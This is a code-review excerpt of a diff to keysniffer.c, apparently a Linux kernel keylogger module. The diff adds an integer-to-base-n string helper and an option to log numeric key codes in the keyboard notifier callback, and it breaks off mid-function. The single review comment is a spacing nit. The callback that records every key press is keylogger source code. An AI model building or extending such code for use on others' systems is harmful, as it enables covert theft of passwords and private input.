keysniffer.c

```diff
@@ -102,35 +108,98 @@ static struct notifier_block keysniffer_blk = {
 	.notifier_call = keysniffer_cb,
 };
 
+/*
+ * Function to convert an integer to a base n string representation
+ *
+ * Parameters :
+ *  - input : integer to be converted
+ *  - n     : numerical base
+ *  - rep   : string buffer to place the representation in
+ *  - size  : the max size of the buffer
+ */
+void to_base_n_string(int input, int n,char *rep,int size){
+	int i;
+	int start;
+	int remainders[size];
+	int div = input;
+
+	for (i = 0; i < size; i++)
+		rep[i] = 0;
+
+	if (!input) {
+		rep[0] = '0';
+		return;
+	}
+
+	i = size - 1;
+
+	while ( div > 0 ) {
+		remainders[i] = div % n;
+		div = div / n;
+		i--;
+	}
+
+	start = i+1;
+
+	for (i = start; i < size; i++) {
+		rep[i - start] = '0' + remainders[i];
+	}
+}
+
 /* Keypress callback */
 int keysniffer_cb(struct notifier_block *nblock,
-		unsigned long code,
-		void *_param)
+		  unsigned long code,
+		  void *_param)
 {
 	size_t len;
+	char rep[sizeof(int) + 1];
+	char key[sizeof(int) + 1];
 	struct keyboard_notifier_param *param = _param;
 	const char *pressed_key;
 
 	pr_debug("code: 0x%lx, down: 0x%x, shift: 0x%x, value: 0x%x\n",
-		code, param->down, param->shift, param->value);
+		 code, param->down, param->shift, param->value);
 
 	if (!(param->down))
 		return NOTIFY_OK;
 
 	if (param->value >= 0x1 && param->value <= 0x77) {
 		pressed_key = param->shift
-				? us_keymap[param->value][1]
-				: us_keymap[param->value][0];
+			? us_keymap[param->value][1]
+			: us_keymap[param->value][0];
 		if (pressed_key) {
-			len = strlen(pressed_key);
+			int pklen, replen;
+			if ( codes ) {
+				to_base_n_string(param->value,10,key,sizeof(int)+1);
```

Comment:
`(param->value,10,key,sizeof(int)+1)`

should be

`(param->value, 10, key, sizeof(int) + 1)`